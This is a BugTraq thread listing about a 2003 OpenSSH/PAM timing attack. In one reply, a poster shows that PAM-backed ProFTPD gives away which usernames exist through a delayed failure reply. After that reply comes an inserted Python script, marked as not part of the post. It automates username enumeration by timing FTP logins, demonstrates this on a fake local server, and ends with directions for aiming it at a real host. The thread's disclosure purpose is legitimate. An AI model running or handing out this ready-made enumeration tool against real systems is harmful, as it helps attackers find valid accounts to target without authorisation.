BugTraq
OpenSSH/PAM timing attack allows remote users identification Apr 30 2003 02:34PM
Marco Ivaldi (raptor mediaservice net) (4 replies)
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 01:15PM
Michael Shigorin (mike osdn org ua) (1 replies)
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 01:48PM
Marco Ivaldi (raptor mediaservice net)
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 12:56AM
Karl-Heinz Haag (k haag linux-ag com)
Re: OpenSSH/PAM timing attack allows remote users identification May 01 2003 03:20PM
Thilo Schulz (arny ats s bawue de) (1 replies)
On Wednesday, 30th April 2003 16:34 Marco Ivaldi wrote:
> During a pen-test we stumbled across a nasty bug in OpenSSH-portable with
> PAM support enabled (via the --with-pam configure script switch). This bug
> allows a remote attacker to identify valid users on vulnerable systems,
> through a simple timing attack. The vulnerability is easy to exploit and may
> have high severity, if combined with poor password policies and other
> security problems that allow local privilege escalation.

This is !!NOT!! a problem specific to OpenSSH.
When I saw this topic come up I tried the same with ProFTPD, which can also
use PAM to authenticate users.

Here is an example with the simple ftp tool:
thilo@Thilo thilo $ ftp www.someftphost.net
Connected to www.someftphost.net.
220 ProFTPD 1.2.5rc1 Server (Debian) [www.someftphost.net]
Name (www.someftphost.net:thilo): thilo
331 Password required for thilo.
Password:
[valid user account, but wrong password: 2 seconds wait]
530 Login incorrect.
Login failed.
ftp>

Same here: if this is an invalid user, there is no delay between entering
the password and the 530 reply.
I tested the Postfix SMTP daemon, Apache and the ipopd POP3 daemon, which have
PAM support; there this weakness is obviously not present. Yet don't consider
all daemons secure, there may still be many others out there that suffer from
the same weakness.

- Thilo Schulz

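The measurement Thilo does by hand above (time from sending the password to the 530 reply, for a known and an unknown account) can be automated. The script below is an added example and is not part of the original post or of ProFTPD; it speaks enough of the FTP control protocol to send USER/PASS, times only the PASS-to-reply gap, and classifies each candidate name by the median of a few samples. So that it runs offline, it starts a constructed stand-in server on localhost that imitates the observed behaviour (delay before 530 for a valid account, immediate 530 otherwise); the account names, the 0.4 s delay and the 0.2 s decision threshold are assumptions chosen for the demo, not values taken from any real daemon.

```python
import socket
import statistics
import threading
import time

# --- Constructed stand-in for a PAM-backed ProFTPD (NOT the real daemon) ---
# Valid accounts incur a PAM failure delay before "530"; unknown accounts are
# rejected at once, which is the leak the post describes.
FAKE_VALID_USERS = {"thilo", "root"}      # assumed accounts on the fake host
FAKE_PAM_DELAY = 0.4                      # seconds; the post saw ~2 s, shortened here


def _serve_one(conn):
    """Handle one control connection of the fake server."""
    rd = conn.makefile("rb")
    user = None
    try:
        conn.sendall(b"220 fake ProFTPD-like server (constructed example)\r\n")
        while True:
            line = rd.readline()
            if not line:
                break
            cmd, _, arg = line.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                conn.sendall(b"331 Password required for %s.\r\n" % arg.encode())
            elif cmd == "PASS":
                if user in FAKE_VALID_USERS:
                    time.sleep(FAKE_PAM_DELAY)   # failed-auth delay only for real accounts
                conn.sendall(b"530 Login incorrect.\r\n")
            elif cmd == "QUIT":
                conn.sendall(b"221 Goodbye.\r\n")
                break
            else:
                conn.sendall(b"500 Unknown command.\r\n")
    except OSError:
        pass
    finally:
        conn.close()


def start_fake_server():
    """Bind the stand-in server on an ephemeral localhost port; return (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


def time_login(host, port, user, password="not-the-password", timeout=15.0):
    """Return (seconds between sending PASS and receiving the reply, reply line)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        rd = s.makefile("rb")
        rd.readline()                                     # 220 banner
        s.sendall(b"USER %s\r\n" % user.encode())
        rd.readline()                                     # 331, always immediate
        t0 = time.monotonic()
        s.sendall(b"PASS %s\r\n" % password.encode())
        reply = rd.readline()                             # 530, delayed or not
        elapsed = time.monotonic() - t0
        s.sendall(b"QUIT\r\n")
        rd.readline()                                     # 221
    return elapsed, reply.decode(errors="replace").strip()


def enumerate_users(host, port, candidates, samples=3, threshold=0.2):
    """Map each candidate name to True (delayed reply, account exists) or False.

    The median over several samples smooths network jitter; the threshold is a
    tunable assumption and should sit between the two latency clusters you
    observe for a known-good and a known-bad name on the target.
    """
    verdict = {}
    for user in candidates:
        times = [time_login(host, port, user)[0] for _ in range(samples)]
        verdict[user] = statistics.median(times) >= threshold
    return verdict


if __name__ == "__main__":
    host, port = start_fake_server()
    for name, exists in enumerate_users(host, port, ["thilo", "bob", "root", "mallory"]).items():
        print(f"{name:10s} {'valid account' if exists else 'no such user'}")
```

Against a real host you would drop the fake server, pass the target's address to `enumerate_users`, and first calibrate the threshold with one name you know exists and one you know does not.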
Re: OpenSSH/PAM timing attack allows remote users identification May 02 2003 11:20AM
Marco Ivaldi (raptor mediaservice net)
Re: OpenSSH/PAM timing attack allows remote users identification May 01 2003 09:12AM
Ethan Benson (erbenson alaska net) (2 replies)
Re: OpenSSH/PAM timing attack allows remote users identification May 05 2003 12:55PM
Marco Ivaldi (raptor mediaservice net)
Re: OpenSSH/PAM timing attack allows remote users identification May 01 2003 06:15PM
Nicolas Couture (nc stormvault net)